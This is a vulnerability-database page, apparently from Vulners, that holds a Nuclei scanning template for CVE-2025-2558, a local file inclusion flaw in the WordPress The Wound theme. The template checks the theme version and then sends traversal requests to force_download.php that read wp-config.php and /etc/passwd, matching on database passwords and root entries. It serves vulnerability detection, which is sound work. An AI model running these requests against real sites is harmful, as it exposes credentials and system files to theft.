Lucene search
K

WordPress The Wound Theme <= 0.0.1 - Local File Inclusion

🗓️ 09 Apr 2026 12:38:39Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

Unauthenticated LFI in WordPress The Wound Theme <=0.0.1 allows downloading arbitrary local files.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-2558
24 Apr 202506:05
circl
CNNVD
WordPress plugin the-wound 安全漏洞
24 Apr 202500:00
cnnvd
CVE
CVE-2025-2558
24 Apr 202506:00
cve
Cvelist
CVE-2025-2558 The Wound <= 0.0.1 - Unauthenticated LFI
24 Apr 202506:00
cvelist
EUVD
EUVD-2025-12113
3 Oct 202520:07
euvd
NVD
CVE-2025-2558
24 Apr 202506:15
nvd
OSV
CVE-2025-2558
24 Apr 202506:15
osv
Patchstack
WordPress The Wound theme <= 0.0.1 - Unauthenticated LFI vulnerability
31 Dec 202500:00
patchstack
Positive Technologies
PT-2025-17690
24 Apr 202500:00
ptsecurity
RedhatCVE
CVE-2025-2558
26 Apr 202509:14
redhatcve
Rows per page
id: CVE-2025-2558

info:
  name: WordPress The Wound Theme <= 0.0.1 - Local File Inclusion
  author: pussycat0x
  severity: high
  description: |
    The-wound WordPress theme through 0.0.1 contains a local file inclusion caused by insufficient validation of parameters used to generate paths passed to include functions, letting unauthenticated users perform LFI attacks and download arbitrary files from the server.
  impact: |
    Unauthenticated attackers can include arbitrary local files, potentially leading to information disclosure or remote code execution.
  remediation: |
    Update to the latest version of the theme where the issue is fixed or apply security patches that validate parameters properly.
  reference:
    - https://wpscan.com/vulnerability/6a8e1c89-a01d-4347-91fc-ba454784b153/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/the-wound/the-wound-001-unauthenticated-local-file-inclusion
    - https://nvd.nist.gov/vuln/detail/cve-2025-2558
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-98
  metadata:
    verified: true
    max-request: 3
    vendor: developer
    product: the-wound
    shodan-query: http.component:"WordPress"
  tags: cve,cve2025,wordpress,wp-theme,lfi,the-wound,wpscan,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/themes/the-wound/style.css'

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "compare_versions(version, '<= 0.0.1')"
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Version: ([0-9.]+)'
        internal: true

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/themes/the-wound/force_download.php?file=../../../wp-config.php'
      - '{{BaseURL}}/wp-content/themes/the-wound/force_download.php?file=/etc/passwd'

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "regex('root:.*:0:0:', body)"
        condition: and

      - type: dsl
        dsl:
          - "status_code == 200"
          - contains_all(body, "DB_NAME", "DB_PASSWORD")
        condition: and
# digest: 4a0a0047304502206d7f1d4cbd5f40e1528a30f0d9e831c3dc8466e5cf5c005c4cf334b9e98a2a51022100c2cabfc9f173230bc8653eb737251f501a31caad436d08ddcc3dd73b4f97352c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Apr 2026 02:52Current
7.4High risk
Vulners AI Score7.4
CVSS 3.18.6
EPSS0.02134
SSVC
4